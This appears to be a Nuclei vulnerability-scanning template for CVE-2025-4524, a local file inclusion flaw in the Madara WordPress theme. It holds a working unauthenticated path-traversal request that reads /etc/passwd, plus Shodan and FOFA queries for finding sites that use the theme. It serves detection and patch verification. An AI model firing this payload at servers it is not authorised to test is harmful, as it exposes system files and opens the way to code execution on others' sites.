id: CVE-2025-4524 info: name: WordPress Madara Theme < 2.2.2.1 - Local File Inclusion author: 0x_Akoko severity: high description: | Madara WordPress theme <= 2.2.2 contains a local file inclusion vulnerability caused by improper sanitization of the 'template' parameter, letting unauthenticated attackers execute arbitrary files on the server, exploit requires crafted request. impact: | Unauthenticated attackers can execute arbitrary PHP code, bypass access controls, and access sensitive data on the server. remediation: | Update to the latest version beyond 2.2.2. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/id/a3ee01da-218a-421d-8f9c-1dc6c056ef74 - https://github.com/ptrstr/CVE-2025-4524 - https://nvd.nist.gov/vuln/detail/CVE-2025-4524 - https://cxsecurity.com/issue/WLB-2026040012 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.1 cve-id: CVE-2025-4524 cwe-id: CWE-22 epss-score: 0.09453 epss-percentile: 0.94913 metadata: verified: true max-request: 1 fofa-query: body="/wp-content/themes/madara/" shodan-query: http.html:"/wp-content/themes/madara/" tags: cve,cve2025,wordpress,wp-theme,madara,lfi,unauth http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars[orderby]=meta_value_num&vars[paged]=1&vars[posts_per_page]=16&vars[post_type]=wp-manga&vars[post_status]=publish matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 490a00463044022017df3d97e3ae0d0a91a74bd62cca062d9aecc416a4040008a134cb7b70ae6dca02203e10dcb80ce57d006b7da479fe5f2c31e5f0ff8c8f830cbe54c26d480ae6d694:922c64590222798bb761d5b6d8e72950